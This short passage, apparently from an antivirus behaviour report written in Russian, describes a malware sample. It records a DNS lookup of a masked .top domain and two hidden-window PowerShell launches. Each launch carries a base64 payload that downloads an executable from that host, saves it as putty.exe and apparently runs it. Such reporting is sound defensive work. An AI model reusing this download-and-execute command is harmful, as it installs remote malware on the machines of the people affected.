Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL3JvY2tucm9sbGV0Y28udG9wL2Rvd25sb2FkMS9oZXJiYWxpZmUuZXhlIiwgJHBhdGgpOyBzdGFy...
- DNS ASK ro####olletco.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL3JvY2tucm9sbGV0Y28udG9wL2Rvd25sb2FkMS9oZXJiYWxpZmUuZXhlIiwgJHBhdGgpOyBzdGFy...' (со скрытым окном)